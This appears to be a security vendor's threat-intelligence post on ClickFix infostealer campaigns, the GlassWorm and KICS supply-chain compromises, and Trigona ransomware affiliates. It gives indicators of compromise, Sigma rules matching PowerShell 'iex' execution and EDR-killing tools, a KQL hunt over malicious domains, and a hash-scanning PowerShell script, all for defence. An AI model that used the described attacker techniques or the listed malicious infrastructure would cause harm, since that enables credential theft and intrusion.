Excerpt
Live OTX analysis reveals ClickFix infostealers, GlassWorm dev attacks, and KICS supply chain compromises targeting finance and tech.
Threat Summary
Recent OTX pulses indicate a convergence of diverse threat vectors—social engineering, supply chain compromise, and traffic distribution systems—united by the objective of credential theft and data exfiltration. Threat actors are increasingly leveraging "living-off-the-land" (LotL) techniques via ClickFix campaigns targeting Windows and macOS users in the finance and travel sectors. Simultaneously, sophisticated supply chain attacks via compromised Docker images (KICS) and malicious code repositories (GlassWorm) are specifically hunting developer credentials and crypto wallets. The appearance of Trigona ransomware affiliates using custom exfiltration tools suggests these credential theft operations are feeding directly into encryption and extortion workflows.
Threat Actor / Malware Profile
ClickFix Campaigns (Lumma, Vidar, Redline)
- Distribution: Social engineering via browser error messages prompting fake tech support or "fix" commands.
- Payload Behavior: Execution of PowerShell/Bash commands to download loaders. Distributes information stealers (Lumma, Vidar, Redline) and RATs (NetSupport).
- C2 Communication: HTTP/HTTPS to domain generation algorithm (DGA) style domains.
- Persistence: Scheduled tasks or startup folder entries established via the initial script.
GlassWorm
- Distribution: Compromised code repositories and package managers.
- Payload Behavior: Staged malware fingerprinting the machine. Installs a fake browser extension for surveillance and a RAT. Steals crypto wallets and dev tokens.
- C2 Communication: Unique technique using the Solana blockchain for payload fetching and C2, bypassing traditional network detection.
- Persistence: Browser extension injection and hidden startup scripts.
TeamPCP (Canister Worm / KICS Compromise)
- Distribution: Poisoned Docker Hub images (Checkmarx KICS) and VS Code extensions.
- Payload Behavior:
mcpAddon.jsand trojanized binaries scan infrastructure-as-code for credentials and exfiltrate them. - C2 Communication: Encrypted HTTP traffic to hardcoded IPs (e.g., 94.154.172.43).
- Persistence: Containerized persistence; persists within the compromised CI/CD pipeline.
Trigona Affiliates (Rhantus)
- Distribution: Initial access likely via previously mentioned loaders or direct exploitation.
- Payload Behavior: Deployment of
uploader_client.exefor custom, multi-threaded exfiltration before encryption. Abuses kernel drivers (WKTools,DumpGuard) to kill EDR processes. - C2 Communication: Custom protocol with connection rotation to evade network monitoring.
IOC Analysis
The provided pulses contain a mix of network and file-based IOCs critical for detection:
- Domains (ClickFix/Keitaro): A high volume of domains (e.g.,
ustazazharidrus.com,ucaboodle.com) associated with traffic distribution systems (TDS) and landing pages. SOC teams should block these at the DNS layer and hunt for historical resolution. - IPv4 (Supply Chain): IP
94.154.172.43is linked to the exfiltration of data from the trojanized KICS binary. Immediate firewall blocking is required. - File Hashes: Several MD5, SHA1, and SHA256 hashes for the KICS malware (e.g.,
d47de3772f2d61a043e7047431ef4cf4) and Trigona tools (e.g.,e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173). EDR solutions should be configured to quarantine processes matching these hashes.
Operationalization: Ingest these IOCs into your SIEM for correlation. Use threat intelligence platforms (TIPs) to auto-update firewall rules. Decode the Keitaro domains to identify potential typosquatting patterns for future hunting.
Detection Engineering
YAML
title: Potential ClickFix PowerShell Execution Pattern
id: c0a1b2c3-4d5e-6f78-90ab-cdef01234567
description: Detects suspicious PowerShell execution often associated with ClickFix campaigns where users are tricked into running repair commands.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/660000000000
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains:
- 'copy-item'
- 'invoke-expression'
- 'iex'
CommandLine|contains|all:
- 'error'
- 'fix'
- 'support'
condition: selection
falsepositives:
- Legitimate system administration scripts
level: high
tags:
- attack.execution
- attack.t1059.001
- attack.initial_access
- attack.t1566.001
---
title: Malicious KICS Binary or VS Code Extension Execution
id: d1e2f3a4-5b6c-7d8e-9f01-234567890abc
description: Detects execution of known malicious file hashes associated with the Checkmarx KICS supply chain compromise.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/660000000002
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains:
- '\kics'
- '\mcpAddon.js'
filter_hashes:
Hashes|contains:
- 'MD5=d47de3772f2d61a043e7047431ef4cf4'
- 'SHA1=250f3633529457477a9f8fd3db3472e94383606a'
- 'SHA256=222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b'
condition: selection and filter_hashes
falsepositives:
- Legitimate use of KICS scanner (verify hash)
level: critical
tags:
- attack.initial_access
- attack.t1195.002
- attack.supply_chain
---
title: Trigona Custom Exfiltration Tool Execution
id: e2f3a4b5-c6d7-8e9f-0123-456789abcdef
description: Detects the execution of Trigona affiliate custom uploader client and associated kernel driver abuse tools.
status: experimental
date: 2026/04/26
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/660000000004
logsource:
product: windows
category: process_creation
detection:
selection_uploader:
OriginalFileName|endswith: 'uploader_client.exe'
selection_tools:
Image|endswith:
- '\WKTools.exe'
- '\DumpGuard.exe'
condition: 1 of selection_*
falsepositives:
- Rare, unless used by admin for driver management
level: high
tags:
- attack.exfiltration
- attack.t1041
- attack.defense_evasion
- attack.t1562.001
kql
// Hunt for ClickFix and Keitaro related domain connections
let MaliciousDomains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "ucaboodle.com", "someotherbox.com", "your-link.online", "linda-makeup.com", "cibcsecurity2fa.com", "rbcdevice-login.com"]);
DeviceNetworkEvents
| where RemoteUrl in (MaliciousDomains) or RemoteDomain in (MaliciousDomains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, ActionType
| summarize count() by DeviceName, RemoteUrl, bin(Timestamp, 1h)
| order by count_ desc;
powershell
# PowerShell Hunt Script for Trigona and GlassWorm Artifacts
# Checks for specific file hashes and suspicious browser extensions
$maliciousHashes = @(
"d47de3772f2d61a043e7047431ef4cf4",
"e1023db24a29ab0229d99764e2c8deba",
"222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",
"e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173",
"816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"
)
Write-Host "Scanning for malicious file hashes..."
# Check common download and temp directories
$paths = @("C:\Users\*\Downloads\", "C:\Windows\Temp\", "C:\ProgramData\")
foreach ($path in $paths) {
if (Test-Path $path) {
Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
$hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash.ToLower()
if ($maliciousHashes -contains $hash) {
Write-Host "[ALERT] Malicious file found: $($_.FullName)" -ForegroundColor Red
}
}
}
}
# Check for suspicious browser extensions (GlassWorm indicator pattern)
$chromeExtensions = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
$edgeExtensions = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Extensions"
Write-Host "Checking for suspicious browser extensions..."
foreach ($extPath in @($chromeExtensions, $edgeExtensions)) {
if (Test-Path $extPath) {
# Look for recently modified extensions in the last 7 days
Get-ChildItem -Path $extPath -Directory | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)} | ForEach-Object {
Write-Host "[INFO] Recently modified extension found: $($_.Name) in $extPath" -ForegroundColor Yellow
}
}
}
Response Priorities
Immediate (0-4 hours):
- Block IOCs: Implement immediate blocking of all listed domains and IP addresses (94.154.172.43) on firewalls and Secure Web Gateways (SWG).
- Hunt Artifacts: Execute the PowerShell script across endpoints to hunt for the presence of Trigona uploader tools and KICS malware.
- Container Quarantine: Identify and isolate any instances running the compromised KICS Docker tags (
v2.1.20,v2.1.21,alpine).
24 Hours:
- Credential Reset: If credential theft is suspected (Lumma/Vidar/RedLine), force reset of passwords for accounts accessed from infected machines. Revoke GitHub/Cloud API keys used by developers potentially targeted by GlassWorm.
- VS Code Audit: Audit developer workstations for the compromised VS Code extension versions (1.17.0, 1.19.0) and remove them.
1 Week:
- Pipeline Hardening: Review and harden CI/CD pipelines to ensure integrity checks (hash verification) are performed on all pulled Docker images and npm packages.
- Training: Conduct security awareness training focusing on "ClickFix" social engineering tactics—specifically the danger of running terminal commands suggested by browser error pop-ups.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsclickfixinfostealersupply-chain-compromisetrigona-ransomwareglassworm
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.